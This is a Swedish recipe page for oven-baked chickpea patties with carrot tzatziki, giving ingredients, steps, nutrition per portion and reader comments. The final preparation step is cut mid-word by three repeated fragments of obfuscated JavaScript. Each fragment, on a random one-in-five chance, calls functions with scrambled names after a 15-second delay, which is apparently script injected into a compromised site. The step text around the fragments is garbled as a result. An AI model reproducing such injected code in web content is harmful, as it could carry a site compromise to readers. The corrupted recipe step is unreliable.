Kikärtsbiffar med morotstsatsiki
2013-07-19- Skill Level: Enkelt
- Yield : 6
- Servings : 2
- Prep Time : 10m
- Cook Time : 15m
- Ready In : 25m
Ingredienser
- 1 burk kikärter
- 1 röd lök
- 1 vitlök
- curry
- 1 tesked sambal oelek
- 3 champinjoner
- rotselleri
- 1 ägg
- 1 dl kvarg
- 1 liten morot
- färsk pressad citron
Gör så här:
Sätt ugnen på 220 ° c.
Skölj och mixa kikärterna i matberedare.
Tillsätt övriga ingredienser i matberedaren.
Forma biffarna. Grädda i ugnen i 15 min ( ev. grilla)
Riv morötterna, blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a med kvarg och vitlök.
Medlemsbetyg
(5 / 5)
3 people rated this recipe
Related Recipes:
Näringssinnehåll
Informationen gäller per portion
-
Kcal
195 -
Protein
13 g -
Kolhydrater
24 g -
Fett
2 g
posted by barbro on 25/07/2013
Hejsan! Ser gott ut måste provas men det står rotselleri i receptet men det ska väl vara morötter?
posted by Milica Jocic on 11/08/2013
Vad kul att du tycker det! Av morötterna gör man morotstsatsiki, inga morötter i biffarna!
posted by Katta on 06/08/2013
Hej! Hur mycket morötter ska man använda?
posted by Milica Jocic on 11/08/2013
1 liten morot hade jag i
Om man tycker om morötter kan man självklart ha i mer 